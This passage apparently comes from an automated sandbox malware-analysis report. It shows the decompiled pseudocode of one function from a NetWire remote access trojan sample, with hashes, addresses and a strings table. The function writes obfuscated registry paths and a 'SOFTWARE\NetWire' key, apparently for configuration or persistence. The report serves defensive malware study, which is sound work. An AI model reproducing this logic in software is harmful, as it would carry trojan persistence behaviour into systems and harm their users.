                                                          • Opcode ID: 246fdc29b333a0ea924cba9d3f13c81f6e5188126dcc5c7f772fd54f0c83ee0b
                                                          • Instruction ID: 5ee87fdfff2276ed8f5c7cc8756256179826899119173577a518fef8d5e42c6b
                                                          • Opcode Fuzzy Hash: 246fdc29b333a0ea924cba9d3f13c81f6e5188126dcc5c7f772fd54f0c83ee0b
                                                          • Instruction Fuzzy Hash: 2421EFB0509314AED310AF52D58879BBBE4BF85348F408C2EE4C857281D7B985899BAB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004089ED, Relevance: 5.0, Strings: 4, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 18%
                                                          			E004089ED(void* __ecx, void* __edx, void* __eflags) {
				char _v528;
				char* _v548;
				char* _v552;
				void* _t9;
				void* _t10;
				char* _t15;
				char* _t16;
				char* _t18;
				void* _t20;
				void* _t21;
				char** _t22;

				_t21 = __edx;
				_t20 = __ecx;
				 *_t22 = 8;
				_t9 = E004082E8(__eflags);
				_t24 = _t9;
				if(_t9 != 0) {
					 *_t22 = "MT_qUDrj\\F4Y0W6W85\\U4RSWg6\\PQ00dR5zd064WR\\rQR\\";
					_t18 = E004081AA();
					_v548 = 0x4224c8;
					_v552 = _t18;
					 *_t22 = 0x80000001;
					E00410803(_t20, _t21);
				}
				 *_t22 = 0x10;
				_t10 = E004082E8(_t24);
				_t25 = _t10;
				if(_t10 != 0) {
					 *_t22 = "MT_qUDrj\\F4Y0W6W85\\DY542d Md5Qs\\XR65CiidS PWlsWRdR56";
					_t16 = E004081AA();
					_v548 = 0x4224a0;
					_v552 = _t16;
					 *_t22 = 0x80000002;
					E0041086B(_t20);
				}
				 *_t22 = 4;
				if(E004082E8(_t25) != 0) {
					_t15 =  *0x42b460;
					if(_t15 != 0) {
						 *_t22 = _t15;
						L0041F78C();
					}
				}
				_v548 = "NetWire";
				_v552 = "SOFTWARE\\";
				 *_t22 = 0x80000001;
				E0041086B(_t20);
				_v552 = 0x204;
				 *_t22 =  &_v528;
				return E00407C77( &_v528);
			}














                                                          0x004089ed
                                                          0x004089ed
                                                          0x004089f3
                                                          0x004089fa
                                                          0x004089ff
                                                          0x00408a01
                                                          0x00408a03
                                                          0x00408a0a
                                                          0x00408a0f
                                                          0x00408a17
                                                          0x00408a1b
                                                          0x00408a22
                                                          0x00408a22
                                                          0x00408a27
                                                          0x00408a2e
                                                          0x00408a33
                                                          0x00408a35
                                                          0x00408a37
                                                          0x00408a3e
                                                          0x00408a43
                                                          0x00408a4b
                                                          0x00408a4f
                                                          0x00408a56
                                                          0x00408a56
                                                          0x00408a5b
                                                          0x00408a69
                                                          0x00408a6b
                                                          0x00408a72
                                                          0x00408a74
                                                          0x00408a77
                                                          0x00408a77
                                                          0x00408a72
                                                          0x00408a7c
                                                          0x00408a84
                                                          0x00408a8c
                                                          0x00408a93
                                                          0x00408a9c
                                                          0x00408aa4
                                                          0x00408ab2

                                                          Strings
                                                          • SOFTWARE\, xrefs: 00408A84
                                                          • MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56, xrefs: 00408A37
                                                          • MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\, xrefs: 00408A03
                                                          • NetWire, xrefs: 00408A7C
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56$MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\$NetWire$SOFTWARE\
                                                          • API String ID: 0-126448098
                                                          • Opcode ID: e80744430c769008ed9aa6cab13524ccc618e940c92f136a1cd14b05883cfc76
                                                          • Instruction ID: bb4ce6ad198e61c342c208a9868e2ee3a63cf1cfb8a338f91740164746fe8c6d
                                                          • Opcode Fuzzy Hash: e80744430c769008ed9aa6cab13524ccc618e940c92f136a1cd14b05883cfc76
                                                          • Instruction Fuzzy Hash: 1101B7B06087119AD700BF65D64526DBBE0AF40348F81C82FE4C86B286DBBD8485DB5F
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%